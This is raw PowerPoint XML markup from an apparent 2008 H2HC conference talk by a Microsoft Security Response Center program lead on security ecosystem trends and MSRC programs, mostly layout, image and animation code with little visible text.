<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide39.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle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40.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/security/msrc/mapp/overview.mspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data4.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide43.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout3.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle4.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide44.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors5.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide44.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.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s>
</file>

<file path=ppt/slides/_rels/slide45.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diagramData" Target="../diagrams/data6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide45.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors6.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle6.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout6.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.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hyperlink" Target="http://www.microsoft.com/Presspass/press/2008/may08/05-20SCPCERTPR.mspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide47.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:msvr@microsoft.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/security/msrc/mapp/overview.mspx" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide48.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48.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chart" Target="../charts/char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chart" Target="../charts/chart6.xml"/><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chart" Target="../charts/chart5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/char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93772" y="210743"/>
            <a:ext cx="8176244" cy="2371591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Evolution of the Ecosystem</a:t>
            </a:r>
            <a:br>
              <a:rPr smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>(and of the MSRC with 3 new strategic programs to rock your world)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2760663" y="3941763"/>
            <a:ext cx="7681912" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stephen “Capt Steve” Adegbite	 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Senior Security Program Mgr Lead </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Security Response Center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Corporation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9220" name="Picture 3" descr="\\showsrus\Images\LOGOS\GEN_LOGO\M\Microsoft logo.GIF"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7481888" y="6537325"/>
            <a:ext cx="1495425" cy="249238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6488668"/>
            <a:ext cx="3534770" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>H2HC 2008-Sao Paulo ,Brazil</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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8"/>
            <a:ext cx="8382000" cy="1630143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Security Ecosystem Trends</a:t>
            </a:r>
            <a:br>
              <a:rPr smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr sz="3200" smtClean="0"/>
              <a:t> Horizontal Integration </a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 32" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="455613" y="3419475"/>
            <a:ext cx="1622425" cy="1835150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 32" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2112963" y="3419475"/>
            <a:ext cx="1622425" cy="1835150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 32" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3770313" y="3419475"/>
            <a:ext cx="1622425" cy="1835150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 32" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5427663" y="3419475"/>
            <a:ext cx="1622425" cy="1835150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 32" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7085013" y="3419475"/>
            <a:ext cx="1622425" cy="1835150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 68" descr="101016_finders"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="2576513"/>
            <a:ext cx="1458913" cy="1601787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 70" descr="101016_malware"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3763963" y="2719388"/>
            <a:ext cx="1574800" cy="1458912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 71" descr="101016_attacker"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5483225" y="2471738"/>
            <a:ext cx="1495425" cy="1709737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 72" descr="101016_organ"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7131050" y="2700338"/>
            <a:ext cx="1655763" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 74" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="4160838" y="4443413"/>
            <a:ext cx="841375" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 75" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="596900" y="4443413"/>
            <a:ext cx="1343025" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 78" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="5889625" y="4443413"/>
            <a:ext cx="727075" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 84"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2433638" y="4352925"/>
            <a:ext cx="939800" cy="560388"/>
            <a:chOff x="1493" y="2268"/>
            <a:chExt cx="592" cy="353"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20498" name="Picture 76" descr="cooltools-1"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="invGray">
            <a:xfrm>
              <a:off x="1527" y="2268"/>
              <a:ext cx="546" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20499" name="Picture 79" descr="cooltools-1"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="invGray">
            <a:xfrm>
              <a:off x="1493" y="2431"/>
              <a:ext cx="592" cy="190"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 85" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="7673975" y="4460875"/>
            <a:ext cx="441325" cy="306388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 22" descr="101016_handyman"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2144713" y="2562225"/>
            <a:ext cx="1571625" cy="1608138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
